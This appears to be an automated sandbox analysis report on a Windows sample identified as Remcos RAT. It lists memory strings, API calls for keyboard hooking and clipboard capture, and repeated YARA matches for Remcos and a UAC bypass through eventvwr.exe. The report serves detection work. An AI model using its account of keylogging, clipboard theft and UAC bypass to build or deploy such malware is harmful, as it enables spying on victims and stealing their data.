          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554348687.0000000000D0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554348687.0000000000D0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/h
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554169284.0000000000CDA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554426544.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554292704.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp, bmkNCLNkqvOpVZ.exeString found in binary or memory: http://geoplugin.net/json.gp
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000000.00000002.2123662025.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, bmkNCLNkqvOpVZ.exe, 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554169284.0000000000CDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp:R
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554348687.0000000000D0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554348687.0000000000D0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpX
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000000.00000002.2122420727.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, bmkNCLNkqvOpVZ.exe, 00000009.00000002.2152867062.00000000030D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Contains functionality to register a low level keyboard hook
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_00409340 SetWindowsHookExA 0000000D,0040932C,0000000014_2_00409340
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,14_2_0040A65A
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,14_2_00414EC1
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,14_2_0040A65A
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_00409468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,14_2_00409468

          E-Banking Fraud

          barindex
          Yara detected Remcos RAT
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4554169284.0000000000CDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2151682675.00000000016F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2123662025.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe PID: 3884, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe PID: 6864, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: bmkNCLNkqvOpVZ.exe PID: 6204, type: MEMORYSTR

          Spam, unwanted Advertisements and Ransom Demands

          barindex
          Contains functionalty to change the wallpaper
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0041A76C SystemParametersInfoW,14_2_0041A76C

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
          Source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
          Source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
          Source: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
          Source: 00000000.00000002.2123662025.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe PID: 3884, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: Process Memory Space: bmkNCLNkqvOpVZ.exe PID: 6204, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess Stats: CPU usage > 49%
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,14_2_00414DB4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeCode function: 0_2_00FAEF240_2_00FAEF24
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeCode function: 0_2_05235A270_2_05235A27
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeCode function: 0_2_073995A80_2_073995A8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeCode function: 0_2_07390C5F0_2_07390C5F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeCode function: 0_2_07390C800_2_07390C80
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeCode function: 0_2_073914F00_2_073914F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeCode function: 0_2_073919280_2_07391928
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeCode function: 0_2_0739191B0_2_0739191B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeCode function: 0_2_073931880_2_07393188
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeCode function: 0_2_073910B80_2_073910B8
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 9_2_014AEF249_2_014AEF24
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 9_2_070F00409_2_070F0040
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 9_2_0710AE2C9_2_0710AE2C
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 9_2_071053379_2_07105337
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 9_2_088732049_2_08873204
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 9_2_088720809_2_08872080
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 9_2_0887B3E09_2_0887B3E0
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 9_2_0887B3F09_2_0887B3F0
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 9_2_0A2410B89_2_0A2410B8
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 9_2_0A2419289_2_0A241928
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 9_2_0A24191A9_2_0A24191A
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 9_2_0A2431889_2_0A243188
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 9_2_0A2487509_2_0A248750
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 9_2_0A240C389_2_0A240C38
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 9_2_0A240C809_2_0A240C80
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 9_2_0A2414F09_2_0A2414F0
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0042515214_2_00425152
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0043528614_2_00435286
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_004513D414_2_004513D4
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0045050B14_2_0045050B
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0043651014_2_00436510
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_004316FB14_2_004316FB
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0043569E14_2_0043569E
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0044370014_2_00443700
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_004257FB14_2_004257FB
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_004128E314_2_004128E3
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0042596414_2_00425964
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0041B91714_2_0041B917
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0043D9CC14_2_0043D9CC
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_00435AD314_2_00435AD3
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_00424BC314_2_00424BC3
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0043DBFB14_2_0043DBFB
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0044ABA914_2_0044ABA9
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_00433C0B14_2_00433C0B
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_00434D8A14_2_00434D8A
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0043DE2A14_2_0043DE2A
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0041CEAF14_2_0041CEAF
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_00435F0814_2_00435F08
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: String function: 00402073 appears 51 times
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: String function: 00432B90 appears 53 times
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: String function: 00432525 appears 41 times
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000000.00000002.2129157362.0000000006EC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000000.00000002.2121128392.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000000.00000002.2123662025.0000000003D59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000000.00000002.2122420727.0000000002DDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000000.00000000.2096814000.0000000000980000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesnwo.exe< vs SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000000.00000002.2122420727.0000000002D51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000000.00000002.2130051264.00000000072D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeBinary or memory string: OriginalFilenamesnwo.exe< vs SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 00000000.00000002.2123662025.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe PID: 3884, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
